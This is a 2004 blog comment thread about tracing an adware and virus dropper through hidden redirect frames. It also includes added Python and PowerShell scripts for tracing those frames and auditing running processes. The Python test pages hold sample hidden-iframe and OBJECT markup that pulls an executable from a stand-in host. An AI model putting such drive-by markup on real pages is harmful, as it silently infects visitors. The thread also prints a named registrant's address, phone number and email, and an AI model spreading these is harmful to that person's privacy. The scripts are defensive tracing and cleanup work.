    Given the lengths to which they’ve gone to hide their involvement, using redirectors scattered all over the place, it’s not one bit surprising to me that they’re using cell phones as their contact phone numbers, or that their contact addresses in the Whois registry might not be real.
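The tracing procedure described above (view the source, pull the hidden IFRAME or OBJECT hop out of each page, repeat until an OBJECT codebase points at the executable, then whois the hosts involved) as an added example in Python; this is not code from the original post. It parses page source only, never fetches the executable, and runs on constructed placeholder pages: the hostnames and the CLSID in it are assumptions, not the real ones from the post.

```python
"""Follow a chain of hidden IFRAME / OBJECT hops by parsing page source only.

Added example, not code from the original post. Nothing is rendered or run:
it only parses HTML the way "view source" (or `lynx -source`) would show it,
on constructed inline pages shaped like the chain the post describes
(iframe -> iframe -> OBJECT whose codebase points at an .exe).
All hostnames and the CLSID below are placeholders, not the real ones.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


def _is_hidden(attrs):
    """True for the 0x0 / 1x1 frames drive-by droppers use to stay invisible."""
    return any(attrs.get(k) in ("0", "1") for k in ("width", "height"))


class HopExtractor(HTMLParser):
    """Collect IFRAME src URLs and OBJECT codebase URLs from one page."""

    def __init__(self):
        super().__init__()
        self.iframes = []   # (src, hidden?)
        self.objects = []   # codebase URLs: where the executable lives

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)     # HTMLParser lowercases tag and attribute names
        if tag == "iframe" and a.get("src"):
            self.iframes.append((a["src"], _is_hidden(a)))
        elif tag == "object" and a.get("codebase"):
            self.objects.append(a["codebase"])


def extract_hops(base_url, html):
    """Return ([(absolute iframe src, hidden)], [absolute codebase URLs])."""
    p = HopExtractor()
    p.feed(html)
    p.close()
    return ([(urljoin(base_url, u), h) for u, h in p.iframes],
            [urljoin(base_url, u) for u in p.objects])


def follow_chain(start_url, fetch, max_hops=10):
    """Walk iframe hops from start_url; return (hops, payload_urls, hidden_hops).

    `fetch(url)` returns page source as a string or raises. The visited set
    and the hop cap stop loops that a network of redirectors could create.
    """
    hops, hidden, visited = [], [], set()
    url = start_url
    while url and url not in visited and len(hops) < max_hops:
        visited.add(url)
        hops.append(url)
        try:
            iframes, objects = extract_hops(url, fetch(url))
        except Exception:          # unreachable or unknown page ends the walk
            break
        if objects:                # reached the dropper: stop, never fetch it
            return hops, objects, hidden
        if not iframes:
            break
        url, is_hidden = iframes[0]
        if is_hidden:
            hidden.append(url)
    return hops, [], hidden


def hosts_to_investigate(urls):
    """Distinct hostnames in the chain, in order: the whois / dig candidates."""
    seen, out = set(), []
    for u in urls:
        h = urlsplit(u).hostname
        if h and h not in seen:
            seen.add(h)
            out.append(h)
    return out


# Constructed sample chain standing in for the pages the post describes.
SAMPLE_PAGES = {
    "http://redirector.example/yyy10.html":
        '<IFRAME SRC="http://banner.example/ads/banners/banner3.php?ID=1" '
        'height="0" width="0" SCROLLING=no FRAMEBORDER=0>',
    "http://banner.example/ads/banners/banner3.php?ID=1":
        '<iframe src=http://zoom.example/stc.php?stid=007 width="1" height="1" frameborder="0">',
    "http://zoom.example/stc.php?stid=007":
        '<object id=install classid="CLSID:00000000-0000-0000-0000-000000000000" '
        'codebase="http://dropper.example/files/install.exe">',
}


def fetch_sample(url):
    """Offline stand-in for a `lynx -source`-style fetch of the sample pages."""
    return SAMPLE_PAGES[url]


if __name__ == "__main__":
    hops, payloads, hidden = follow_chain("http://redirector.example/yyy10.html", fetch_sample)
    for i, h in enumerate(hops):
        print(f"hop {i}: {h}{'  (hidden frame)' if h in hidden else ''}")
    print("dropper executable(s):", payloads)
    print("hosts to whois/dig:", hosts_to_investigate(hops + payloads))
```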

  13. I’m with you on that. Firefox all the way (both in Linux and MacOS) for me. Fortunately, I don’t have to deal with a Windows system. Strangely enough, I’ve never had a Windows system — went directly from MacOS to Linux, and have only recently strayed back, now that MacOS doesn’t suck nearly as much as it used to 😉

  14. Spectacular bit of netrunning. This is like the game Uplink, only real. 🙂

    Magnificently done, sir. If, despite my efforts, you *do* manage to conquer the world, I think I’d like to apply for the job of leading your strike team to burn these people to the ground.

          • Re: Nice.

            They will let him slide as long as nobody complains. Spammers and net-assholes should be exposed to the light of day in any way possible, but LJ protects them. In LJ Abuse’s opinion, just revealing the first and last NAME of someone else is a TOS violation – never mind the address, phone, whatever.

            I’d heard that LJ Abuse was a bunch of power-mad idiots before – but the people screaming were abusive themselves. Then this happened: http://www.cetan.com/wordpress/index.php?p=55 and the same guy got me suspended.

          • Re: Nice.

            Interesting writeup. If the LJ TOS can be interpreted in this way, then a post such as “George Bush is a lousy president” violates the LJ TOS.

            It’s easy to see why a community such as LJ needs a mechanism to prevent its users from abusing one another by, for example, posting private information about other members; in some cases (say, in the case of a person seeking to escape an abusive spouse), publishing this kind of information can be extremely dangerous.

            On the other hand, information which is already public is…well, already public. The name of the President of the United States is public; therefore, claiming that a post which names the President violates LJ’s TOS would be absurd. In the URL you posted, what happened is, I believe, along the lines of someone posting the President’s name; to say that this information is not public seems pretty silly. A person who does not wish to be associated with his statements should not make those statements in public.

            Similarly, information that is published in Whois records, for example, is clearly already public.

            I can see a hard and clear distinction between, say, a post that uses my name and says “This person is the registered owner of record of the domain name ‘www.xeromag.com'” and a post that uses my name and says “Franklin lives at this address, and at two o’clock this morning we’re all going to his house to murder him with pickaxes, anyone want to join us?” In my mind, and (one would hope) in the minds of any reasonable abuse person at any reasonable ISP or Web forum, the distinction between these things is obvious.

            I guess we’ll see what happens…

          • Re: Nice.

            You’ve said exactly what any person who can both think and breathe at the same time has said.

            I said to LJ Abuse that public information, by definition, can’t be a violation of privacy – especially something clearly self-published like your name. They argued that with me. Seriously. To LJ Abuse any information that is personally identifiable (even a name like John Smith, so common it isn’t personally identifiable) is a violation of the TOS.

            And yes, I’m hoping to raise your hackles about such a stupid ass policy in a lame attempt to make more LJ users vocally complain about it.

          • Re: Nice.

            I posted the text of a spam email to an LJ forum (it was an invite to join an email group similar to the forum, and I was curious to know if others in the group had received the same spam, as it had come to an address that I don’t use for any group email).

            The spammer’s name and business address were in the spam and I had my account suspended for that.

            I wrote them a WTF letter — the guy’s name was part of the business name: John Doe Consulting so it was public record anyway. Then went in and very snarkily changed the “personal details” and posted that I’d done so in order to comply with the TOS and protect spammer’s rights.

            But I did get my account back.

    • Re: Nice.

      Oh, and Tacit – my #1 way, even before the firewall and other stuff, to protect my idiot relatives (and any of them that browse iWon.com all day are idiots, I’ve got a few) is to set up their user account as NOT an administrator. All the junk can’t install if they don’t have the administrative rights to install the files and registry garbage.

      • Re: Nice.

        An excellent idea. I wish that Windows did this by default, and I also wish the Windows security model were closer to Unix in that even with an administrator account, the user must still validate by entering his password before doing anything that could potentially be destructive.

  16. Viewing HTML Source Safely

    I think one of the safest ways to do the research you describe would be to use Lynx instead of anything graphical. Available for Linux and Windows (and working on a Mac port, it seems), it’s easy to just download the source and display it on the screen.

    lynx -source http://yoururlhere.tld/yadda/yadda/yadda/biginfection.html

    will dump the source code to the screen.

    Another item of interest is using the -head option to just retrieve and display the header. For the first URL you listed (the start of the journey to infection):

    HTTP/1.1 200 OK
    Date: Tue, 09 Nov 2004 16:05:49 GMT
    Server: Apache/1.3.27 (Unix) (Red-Hat/Linux) mod_python/2.7.8 Python/1.5.2 mod_ssl/2.8.12 OpenSSL/0.9.6b DAV/1.0.3 PHP/4.3.7 mod_perl/1.26
    Last-Modified: Mon, 18 Oct 2004 03:00:17 GMT
    ETag: “330223-90-417331c1”
    Accept-Ranges: bytes
    Content-Length: 144
    Connection: close
    Content-Type: text/html

    Lynx can be found at http://lynx.browser.org/. And no, I’m not a developer; I’m just someone who gets a lot of utility out of the program.

    A very good writeup. Thanks for the information.

    — Matt

  22. Re: Viewing HTML Source Safely

    That’s a most excellent suggestion. I’d like to see Lynx available for Macs, as I don’t feel comfortable doing this kind of research from a Windows box regardless of the type of browser, though I think I’m going to install Lynx on my Linux box this evening. It looks like a good tool for the arsenal. Thanks!

  24. Additional information from a helpful reader on the news.admin.net-abuse.email newsgroup:
    The Russian-hosted Web site is:

    http://213.159.98.203/ = Adsavior.com

    11/08/04 11:05:06 dns Adsavior.com
    Adsavior.com NS (Nameserver) ns1.adsavior.biz
    Adsavior.com NS (Nameserver) ns2.adsavior.biz
    Adsavior.com A (Address) 213.159.98.203
    mail.Adsavior.com A (Address) 213.159.98.209
    ns1.adsavior.biz A (Address) 213.159.98.204
    ns2.adsavior.biz A (Address) 213.159.98.208

    Organization:
    Adsavior Inc.
    James Finlayson
    #395-1027 Davie St.
    Vancouver, bc V6E4L2
    CA
    Phone: 6046969057
    Email: jamesinflames69@hotmail.com
    Registrar Name….: Register.com
    Registrar Whois…: whois.register.com
    Registrar Homepage: http://www.register.com
    Domain Name: ADSAVIOR.COM
    Created on…………..: Thu, Sep 16, 2004
    Expires on…………..: Fri, Sep 16, 2005
    Record last updated on..: Mon, Oct 04, 2004

    It appears that linkey.ru and IPs in the same general block as “Adsavior.com” are well known for Net abuse. Mr. Finlayson, another Canadian, appears to be deeply involved in this particular virus/adware gang as well.

  26. Another followup, courtesy of a regular in the NANAE newsgroup:

    http://www.computing.net/security/wwwboard/forum/13517.html

    This page describes another user’s problem very similar to the one I dealt with on Shelly’s computer, and confirms that Rackspace is dirty–they know what their clients are doing, and they approve and condone this activity. In particular, here is the text of a reply sent by Rackspace to another user who wrote to Rackspace and complained they were hosting virus droppers:

    “From: abuse@rackspace.com [mailto:abuse@rackspace.com]
    Sent: Friday, September 24, 2004 3:42 AM
    To: steve
    Subject: [Incident 040923-000056] http://69.20.56.3/yyy10.html

    Recently you requested personal assistance from our on-line support center. Below is a summary of your request and our response.

    If we do not hear from you within 48 hours we will assume your issue has been resolved.

    Thank you for allowing us to be of service to you.

    Subject
    —–
    http://69.20.56.3/yyy10.html

    Suggested Answer
    —–
    At 09/24/2004 03:42 AM we wrote –

    Hello,

    Please send an email to info@look2me.com and ask for the uninstall script. If you would rather give them a phone call, they can be reached at 866-705-2728. Please update this ticket if you do not hear back from them within 48 hours and we will contact the customer.

    Regards,
    Sydney McHale
    Rackspace Managed hosting (TM)”

    I was right–Rackspace knows EXACTLY what’s going on, but since Rackspace is making money on it, Rackspace doesn’t care. Dirty, dirty, dirty.

      • If you read between the lines, what Rackspace is saying is:

        “Yes, we know our client is planting adware on people’s computers. Yes, we support and condone this behavior. We will not terminate our client; instead, we’ll just ask you to ask the client for adware removal software.”

        The problem is, Rackspace’s dirty client is planting the spyware using redirectors and Explorer security vulnerabilities, and hiding the source of the adware by redirecting through servers in other countries. Anyone who lacks the technical skill (and the six hours of work) required to track the infection down to the Rackspace client would never know to contact Rackspace’s client for the removal tool.

        Rackspace knows what their client is doing. They know their client is planting adware. They know their client is taking incredible measures to conceal his identity. They know their client is planting the adware using Explorer exploits. They don’t care; they do not consider this activity “abuse,” and they do not terminate people for doing this. Therefore, Rackspace is dirty.

        • If you read between the lines […]
          If you do, you assume. If you assume, your arguments are null and void as they are not based on facts, but assumptions.
          I understand what you’re saying, but unless you try to follow at the very least, you can’t even do anything about them but rant and rave.
          And what’s that going to do? Don’t waste your time; make it count. They can be brought to court.

  28. Re: Viewing HTML Source Safely

    Just a note:
    The head on that apache server shows that it’s quite out of date, and is subject to numerous vulnerabilities.

  31. Re: virii

    I will. It’s odd. You’d think that without a job, I’d have plenty of time but I spend a lot of time in interviews and preparing things and such. Still, I should allocate the time.

  32. Yes, you. Even if you are technically literate, you have a firewall, and you never download suspicious attachments, you are almost certainly infected.

    Nope, sorry. I don’t bother with a firewall or “antivirus” software, either. I don’t know how everyone else gets so much of this stuff. Probably Outlook.

    Do NOT visit this URL if you are on a Windows machine; you WILL become infected.

    No, I won’t. IE asks me if I would like to install something, and I say no. End of story. I’m using IE6 with more or less the default settings, and it’s probably even a few patches behind the curve, since I haven’t yet applied SP2 here. Perhaps you need to change “Download signed ActiveX controls” to something other than “Enable”.

    • “No, I won’t. IE asks me if I would like to install something, and I say no. End of story.”

      Try it.

      The iFrame exploit is an exploit that will cause Explorer to download and run any executable without asking you, even if you have instructed Explorer not to download ActiveX controls (or anything else). All versions of Explorer except the one that ships with XP Service Pack 2 are vulnerable; all will download and run executables without informing the user, regardless of the user’s settings.

      Many viruses and adware/spyware spread using this or other Explorer vulnerabilities. Are you sure you aren’t infected? When was the last time you ran the virus check at housecall.trendmicro.com or ran ad-busting programs? You might just be surprised.

      • Ah, I didn’t realize the behavior was different when nested in an IFRAME. It was clearly downloading the executable before asking any questions, but that was probably only to verify the signature. Why the warnings about the final link, then?

        Are you sure you aren’t infected? When was the last time you ran the virus check at housecall.trendmicro.com or ran ad-busting programs?

        Yes, quite sure. Never. I don’t particularly mind sites sharing cookies, and I know all the various ways things can make themselves run at startup in Windows. Most of the “ad-busting programs” to which you refer use a signature database, just like a virus scanner, which is entirely the wrong way to go about it. Try HijackThis next time you have a problem.

        Naturally I would notice if advertisements were spontaneously appearing on my computer; and occasionally I need to watch all IP traffic to my desktop, so I would notice anything really sneaky phoning home at that time.

        You might just be surprised.

        What, is the virus threat level orange today? You can’t scare me, I have backups. None of this stuff surpasses the level of “nuisance”, and I’m not going to pay Symantec for a tool which wouldn’t help anyway.

          • Switching is impossible when one of the main reasons you need Windows at all is to support a web application which only works in IE. Besides, Mozilla doesn’t help you with hole-of-the-month in some RPC service, or when you have to use Outlook. Finally, IE is more convenient, because it’s always loaded.

            Mozilla is a nice product, but using it exclusively is not a “no-brainer” in my case.

          • You’re making it harder than it has to be. Just use IE when you have to, and switch to another browser the rest of the time. What’s so hard about that?

          • It’s not particularly difficult, it’s just not a win for me. I don’t want to have two streams of URL history to search, or two sets of hotkeys to remember. I occasionally use Mozilla for debugging Javascript, but haven’t yet found it worthy of routine use.

        • All my ad-busting and anti-virus software is free.

          I never had any sign of problems — yet my machine was VERY infected the first time I scanned.

          Your choice, of course. If people seem a bit angsty on the issue, it is likely because one thing the malware can do is use unsuspecting machines to further propagate themselves. It therefore behooves all of us to ensure that each and every one of us is protected.

          As with terrorism and STDs, it is important to remember that the individuals’ judgement must rule as regards what level of protection he is comfortable with, however.

          I think people often forget that. I know *I’d* be pretty pissed if someone came down my street locking everybody’s front doors — for their own safety.

          • I never had any sign of problems — yet my machine was VERY infected the first time I scanned.

            I’ve cleaned several officemates’ computers, I’m sure I know what to look for.

            If people seem a bit angsty on the issue, it is likely because one thing the malware can do is use unsuspecting machines to further propagate themselves.

            Spyware and popup spam are mostly disjoint from worms.

  33. Yes, you. Even if you are technically literate, you have a firewall, and you never download suspicious attachments, you are almost certainly infected.

    Nope, sorry. I don’t bother with a firewall or “antivirus” software, either. I don’t know how everyone else gets so much of this stuff. Probably Outlook.

    Do NOT visit this URL if you are on a Windows machine; you WILL become infected.

    No, I won’t. IE asks me if I would like to install something, and I say no. End of story. I’m using IE6 with more or less the default settings, and it’s probably even a few patches behind the curve, since I haven’t yet applied SP2 here. Perhaps you need to change “Download signed ActiveX controls” to something other than “Enable”.

  34. I’m currently using FireFox, and it doesn’t make that big a difference, really. If I go a week or so without running SpyBot, when I finally do run it, it finds SKAJILLIONS of spyware. (Spywares?)

    I have it running automatically every night; almost every morning, it tells me it’s found five items. I don’t know if they’re the SAME five items that are simply resisting removal, or if I just pick them up on my usual daily rounds of websurfing.

  35. Typo

    I think that should be ‘Pest Patrol’ not patron. It isn’t freeware, so I haven’t gotten around to using it yet, but their website allows you to perform a scan on your system that catches stuff (like a particular IE toolbar I absolutely loathe) that AdAware and Spybot can’t. (I removed so much garbage from my parent’s computer I can’t be sure what did what, but anything that appends a gigantic ad to the top of your homepage when you start your browser, requiring you to scroll down to view the site, necessitates deaths instead of legal action.)

  36. “No, I won’t. IE asks me if I would like to install something, and I say no. End of story.”

    Try it.

    The iFrame exploit is an exploit that will cause Explorer to download and run any executable without asking you, even if you have instructed Explorer not to download ActiveX controls (or anything else). All versions of Explorer except the one that ships with XP Service Pack 2 are vulnerable; all will download and run executables without informing the user, regardless of the user’s settings.

    Many viruses and adware/spyware spread using this or other Explorer vulnerabilities. Are you sure you aren’t infected? When was the last time you ran the virus check at housecall.trendmicro.com or ran ad-busting programs? You might just be surprised.

  37. I’ve been using firefox for a couple of months now and haven’t picked up a single piece of spyware. None that spambot or adaware have picked up on anyway. With IE I was picking up about 40 a week.

    Perhaps there’s a setting that needs tweaking somewhere?

  38. Re: Nice.

    I posted the text of a spam email to an LJ forum (it was an invite to join an email group similar to the forum and I was curious to know if others in the group had received the same spam as it had come to an address that I don’t use for any group email)

    The spammer’s name and business address were in the spam and I had my account suspended for that.

    I wrote them a WTF letter — the guy’s name was part of the business name: John Doe Consulting so it was public record anyway. Then went in and very snarkily changed the “personal details” and posted that I’d done so in order to comply with the TOS and protect spammer’s rights.

    But I did get my account back.

  39. Re: are we safe?

    (Coming at you via ‘s LJ…)

    I’ve recently run into a spyware dropper that, although not silent, still has FF and all other ‘zilla browsers attempt to install spyware. Here’s a screenshot (hosted on my own web server):

    http://www.caspeed.com/lj04/webbug1.png

    The javascript that drops the spyware has a section expressly devoted to Netscape installs. If the user is clueless and clicks install anyways, they get the bug.

    It’s only a matter of time before Zilla family browsers have a serious hijacker written for them. Enough people will click the install button anyways that it will be worth the spammers effort to do so.

    More on this exploit attempt in my own blog at: http://www.livejournal.com/users/makovette/393159.html

    CYa!
    Mako

  40. Quite Interesting!

    I’m not sure how this relates, but IndyMedia’s Servers, hosted at a Rackspace Co-lo in London were seized based on a warrant served to the Texas location, from some third party government (apparently Italy). With not a whole lot of due-process or explanation going on. IndyMedia was accused of the usual Terrorist ties, information denied for National Security, etc.

    I just found it very interesting that it was Rackspace involved in your search and problem.

  42. Thanks.

    I was pointed this way by . Verrrrry very interesting essay. Thanks for going into all the trouble of writing your experience with scumbags down—the more we are informed, the better protected we are.

  44. Ah, I didn’t realize the behavior was different when nested in an IFRAME. It was clearly downloading the executable before asking any questions, but that was probably only to verify the signature. Why the warnings about the final link, then?

    Are you sure you aren’t infected? When was the last time you ran the virus check at housecall.trendmicro.com or ran ad-busting programs?

    Yes, quite sure. Never. I don’t particularly mind sites sharing cookies, and I know all the various ways things can make themselves run at startup in Windows. Most of the “ad-busting programs” to which you refer use a signature database, just like a virus scanner, which is entirely the wrong way to go about it. Try HijackThis next time you have a problem.

    Naturally I would notice if advertisements were spontaneously appearing on my computer; and occasionally I need to watch all IP traffic to my desktop, so I would notice anything really sneaky phoning home at that time.

    You might just be surprised.

    What, is the virus threat level orange today? You can’t scare me, I have backups. None of this stuff surpasses the level of “nuisance”, and I’m not going to pay Symantec for a tool which wouldn’t help anyway.

  45. When it comes to scanning for viruses and other malware, I think we need to reiterate an axiom from 20 years ago: the only way to reliably scan a system is after it’s been booted from provably-clean media, with no programs/drivers/etc. whatsoever loaded from the potentially-infected drives.

    Unfortunately Windows makes this difficult at best.

  47. If this particular spyware qualifies as a virus, can’t the original perps be prosecuted under the Homeland Security Act? (I.E. use that fascist HS organization FOR OUR benefit?)

    Wouldn’t that be nice?

  50. *Growl…* I hate the way these companies work… Ugh.
    i’ll have to take more caution from now on. Oi. I just wish we could prosecute them and actually find a way to prove them guilty.
    I’m going to add this to my memories. It’s an important write-up, and I thank you for it.

  52. My work machine (btw- this is a lab for the state of Georgia) has that damned ‘well-known scourge of the internet’ “anti-spyware” POS.

    I can’t kill it (the state boys have tried – it just comes back)- my old box runs on windoze 95(I’m supposed to get a new system by the end of the year so the story goes..) and so most anti-spyware stuff won’t work. Other than nuke and pave, all I can do is to control it with various pop-up and home page blockers.

    OTOH – my home beast is _clean_. One thing that will stop these malicious spyware bastards is to manage your cookies. Most of these need a ‘trigger’ – and if it doesn’t know where it is – it won’t start. I’m also very leery of certain sites and have a firewall and anti-spyware/virus stuff.

    And don’t use IE – that is a disaster waiting to happen. Use Mozilla or at least Netscape 7.2 so you can control your box’s security.

    • Because it’s not a priority.

      They can barely be bothered to do anything about identity theft, phishing sites, advanced-fee scams, and pyramid schemes; it’s simply not a priority.

  54. Might one ask where you did put them? I would like to come up with some good alternatives to present to someone who’s looking into corporate hosting on their servers.

  55. Check out SpywareBlaster – it’ll stop IE and Firefox from bringing in new spyware/adware bots onto your computer in the first place. Either google it, or there’s a link inside of SpyBot (if ya question its authenticity), but it works awesomely.

  56. currently dealing with said infection via long distance…

    happy to report – 6 days into what seems like hell we are making progress…

    I use firefox personally, I have a router and I use system works, I use a few reg mechanic like programs for maint, that includes spython – after a new in the background bi monthly maint schedule – I am happy to report – nada on the virus/?ware end – I am still running 98_se on all three machines – and am a wee bit apprehensive to move into the xp playing field.

    Breklor sent me here, and I’ll pass on the news,

    I really do appreciate your comments – as they are of great help.

    Light and Love

  58. I have five persistent DSO exploits that Spybot finds EVERY TIME. I am sure it’s the same infection.

    I almost never get new spyware infections since switching to FireFox.

    Is it possible you have an IE hijack that’s still running IE spyware installs even when you’re not using it?

  59. I was thinking the same thing.

    I used to do something similar on the college library. I would trace back who installed software that shouldn’t be there. It eventually started to lead to a group of young men. They turned out to be crackers. They’d managed to gain root on a couple of our servers. The most we were able to do to them, though, was to ban them from the lab, since the dean was friends with one’s mother. *shrugs*

  60. extortion

    When spy/malware infects your computer, takes over your browser with start-up pages, pop-ups and pushing sex sites on you and then follows up with “spyware removal” – this is

    My state computer has this crap now and though its “managed” or contained to a degree, its still around waiting. I’d love to see if I can convince the state to use their much more mighty powers to nail these bastards.

    Or how about a large class-action suit? Thoughts on this?

  64. It’s not particularly difficult, it’s just not a win for me. I don’t want to have two streams of URL history to search, or two sets of hotkeys to remember. I occasionally use Mozilla for debugging Javascript, but haven’t yet found it worthy of routine use.

    • Which version of Windows do you use?

      My mother was infected with something very similar just a few weeks ago. I or somebody else listening could probably walk you through the steps to get rid of your problem.

        • –First off, I don’t know you and I don’t know what you know, so I have to assume from the start that you don’t know anything. If I’m insulting your intelligence, I apologize–

          Okay… first thing you should do is open up a browser window to this site.

          This is what we’ll use to find the problem in the first place. If you have a second computer in your house, you should use the uninfected computer to go to this site. If not, we’ll just have to make do.

          Next, hit the “Ctrl”, “Alt” and “Del” buttons at the same time. A menu should come up on your screen with about six buttons. One of them should be called ‘Task Manager’. Click on that button and another window comes up. There should be three tabs towards the top – ‘Applications’, ‘Processes’ and ‘Performance’. We want to click on the one named ‘Processes’.

          Make sure you have a piece of paper and a pencil for the next part. In the first column in your Task Manager window should be a big list of names. These are all the ‘processes’, which mean all the programs that are currently running on your computer. The bad programs causing your problems are in here somewhere. Your web page is open to the Process Library, a site that tries to catalog every process from every program there is. It’s not complete, but it’s a good place to start.

          Look at the first process name in your task manager window, I want you to type that name into the search engine at Process Library. It’s that big blue box that says ‘Search for a Process’. Hit the ‘Search Now!’ button, and if there is an entry for your process, it will be displayed.

          Look at the description of the process. If it says your process ‘is a part of the Microsoft Windows Operating System”, then we know it’s ok. If it says that it’s related to some piece of software that you know you’ve got on your computer, or some piece of hardware that you know you have (like your printer), that’s ok too. If it says that the process is related to a known virus, write the name down. If it can’t find the process in the library, write that down too. If it says that a process belongs to something that you don’t think is on your computer, write that down too.

          Go through the whole list of processes like this, and write down the names of every one that look suspicious.

          Post that list as a response here, or email it to me, or post it as a comment on my journal.

          • I FINALLY did it

            Sorry it’s taken me so long to actually DO this… it’s been Finals, and you can imagine how hectic it has been. Firstly, thank you very much for your patient indications, I followed through and found the following:

            Processes Not found in Library:
            WPC54CFG.exe
            OdHost.exe
            TabUserW
            ScannerFinder.exe (I suspect this may be tied to my Microtek scanner?)
            NICServ.exe

            Spyware Found (which Spybot seems to have failed to remove):
            ViewMgr.exe (ViewPoint Media Player)

            No mention of VX2, though– and today Spybot , for the first time, eliminated VX2 from its list of bogies without telling me it couldn’t remove this or that component related to it. However, it seems to have passed VMP by.
            I wait for your feedback. And thanks again 🙂

          • Re: I FINALLY did it

            Okay… I’m looking in a few other places for details on your processes…

            WPC54CFG.exe is a utility used by the Linksys Wireless-G Notebook adapter. OdHost.exe and NICServ.exe are also associated with this piece of hardware. If you have one of these, then these processes are ok.

            TabUserW is a driver for a Wacom pen tablet. Same as above.

            ScannerFinder.exe is, as you suspected, related to your Microtek scanner.

            If Spybot got rid of VX2 for you, then looks like ViewMgr.exe is the only remaining problem.

            This next part is a bit dangerous for normal users. Print this out, and do exactly what it says.

            Click the Start button, then click Run and type in ‘regedit’ in the box that comes up. This is the Registry Editor. You don’t want to make any changes here – if you change the wrong values, you make your applications or even your entire operating system stop working.

            There should be two panes in the regedit window. At the very top of the left pane, there should be a little computer icon that says ‘My Computer’ next to it. Click on that one to highlight it, then in the Menu bar click Edit, then Find. In the box that comes up, type in ‘ViewMgr’, and click ‘Find Next’.

            It might take a minute to find the entry, and there may be more than one. You can use the F3 key to find the next entry. The registry entry you’re looking for should be in a folder named ‘Run’. (The folders are in the left pane.) In the right pane you should see several columns. If you’ve got the right entry, ViewMgr should appear under ‘Name’. Under ‘Data’ should be the complete name and path of a program. Write it down. Everything from “C:\(whatever)” to “\(whatever).exe”. When you’ve written down this file name, click ‘Registry’ and ‘Exit’ in the Menu bar without making any changes.

            Next you need to reboot. While your computer is booting, hit F8 repeatedly. This should bring up a text menu with several different booting options. If the menu doesn’t come up, reboot and try again. When the menu comes up, what we want is an entry that says something like “Recovery Console with Command Prompt Only” or possibly “Safe Mode with Command Prompt”. If there’s nothing like that there, we can probably make do with the option that says “Safe Mode”.

            If you can get the command prompt option, you’ll boot to a simple black screen with words on it, just like an old DOS computer. Type in “DEL”, then a space, then that whole name you wrote down earlier. It should be something like “DEL C:\(directory names)\(program).exe”. Type that in exactly, and hit return. Then restart the computer again (just hit the reset button, or turn it off and back on again), and run Spybot one last time. Everything should be ok.

            If you get into Safe Mode instead, open up My Computer and look through the drives and folders there for the program you wrote down. If you can’t see it, you may have to change some of the settings under Tools…Folder Options…View until you can see it. Then click on that file and delete it, and make sure to empty your Recycle Bin too. Then restart and run Spybot one last time.

            If you have any problems with this, go ahead and post again. Hope this helps!

        • One potential problem: Some variants of VX2 conceal themselves so that they don’t show up in the Task Manager.

          It’s also memory-resident, meaning that if you wipe out the files on disk, it’s still running in RAM, and just writes itself back to disk again.

          Ad-Aware has a VX2 plugin tool which sometimes works. I’d suggest downloading Ad-Aware and the VX2 plugin from http://www.lavasoft.de and then restarting the computer in “safe mode.” Run the Ad-Aware VX2 plugin, then immediately run Ad-Aware, then turn off the computer (to kill anything memory resident), turn it on, boot in Safe Mode again, and run both the VX2 tool and Ad-Aware again.

          • Conceal itself from the NT/2K/XP Task Manager? I’d love to see that. I’ve had several programs claim they could do this, but they only seemed to manage this on 9x-based systems.
            That, and I prefer to use SysInternals’ version of the Task Manager, anyway, which seems to see everything as well.

          • The deal is, we’re only half finished. After you find the source of the problem, get into the recovery console with the command prompt only, and get rid of the problem files. In safe mode, with no GUI, you minimize the chance that VX2 or something like it is running.

            Then you get back into Windows. The registry tags that try to load your problem are still there, but the files are missing, so nothing gets loaded. Then you run your anti-virals, anti-spyware and registry cleaners.

            This won’t get everything but it will take care of most problems that Ad-Aware, Spybot, or your anti-virus program don’t see. If it’s beyond this, it’s certainly beyond my ability to walk a user through the process remotely.

        • Just pop over to Spywareinfo and we’ll see what we can do for you. They’re the ones the invented the manual fix for this stuff.

          http://forums.spywareinfo.com

          On a side note, Linkey.ru is also where the CWS strain that used the HackerDefender rootkit was hosted – it’s the host for the Outhost.info strain. They’re up to their neck in illegal activities.
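
The walk-through in this thread (write down every process, check it against a process library, then hunt for the matching entry under a ‘Run’ key in regedit) can be done in one pass from a PowerShell prompt. What follows is an added example, not code from the thread or from any of the tools it names: it lists running processes and logon autorun entries together with their image path and Authenticode signature status, so that the unsigned and missing-on-disk entries become the short list to investigate. It assumes Windows PowerShell 5.1 or later on a Windows host and an elevated prompt; the registry key list, the path-parsing heuristic and the trust labels are the example’s own choices. It shares Task Manager’s blind spot, since both ask the running kernel which processes exist, which is exactly why the advice here to work from Safe Mode or clean media still stands.

```powershell
# Added example, not code from the thread. Windows PowerShell 5.1+ on Windows;
# run elevated so the image paths of other users' processes are readable.

function Get-ExecutableFromCommand {
    # Pull the executable out of a Run-key value such as
    #   "C:\Program Files\Foo\bar.exe" /silent    or    %SystemRoot%\viewmgr.exe -start
    param([string]$Command)
    $cmd = [Environment]::ExpandEnvironmentVariables($Command.Trim())
    if (-not $cmd) { return $null }
    if ($cmd.StartsWith('"')) {
        $end = $cmd.IndexOf('"', 1)
        if ($end -gt 1) { return $cmd.Substring(1, $end - 1) }
    }
    # Unquoted: grow the candidate one token at a time until a file with that name
    # exists, which copes with unquoted paths that contain spaces.
    $tokens = $cmd -split ' '
    for ($i = 1; $i -le $tokens.Count; $i++) {
        $candidate = $tokens[0..($i - 1)] -join ' '
        if (Test-Path -LiteralPath $candidate -PathType Leaf -ErrorAction SilentlyContinue) { return $candidate }
    }
    # Bare names such as rundll32.exe are resolved through PATH, as the loader would.
    $found = Get-Command $tokens[0] -ErrorAction SilentlyContinue
    if ($found -and $found.Source) { return $found.Source }
    return $tokens[0]
}

function Get-FileTrust {
    # Trust labels are this example's own: Missing, Unsigned, Signed: <subject>, Invalid.
    param([string]$Path)
    if (-not $Path -or -not (Test-Path -LiteralPath $Path -PathType Leaf -ErrorAction SilentlyContinue)) {
        return 'Missing'
    }
    $sig = Get-AuthenticodeSignature -FilePath $Path
    switch ($sig.Status) {
        'Valid'     { return "Signed: $($sig.SignerCertificate.Subject)" }
        'NotSigned' { return 'Unsigned' }
        default     { return "Invalid ($($sig.Status))" }
    }
}

function Get-RunningProcessReport {
    # The Task Manager "Processes" tab, with image path and signature added.
    # Processes whose path is unreadable (System, protected processes) are skipped.
    Get-Process | Where-Object { $_.Path } | ForEach-Object {
        [pscustomobject]@{
            Source = 'process'
            Name   = $_.ProcessName
            Id     = $_.Id
            Path   = $_.Path
            Trust  = Get-FileTrust -Path $_.Path
        }
    }
}

function Get-AutorunReport {
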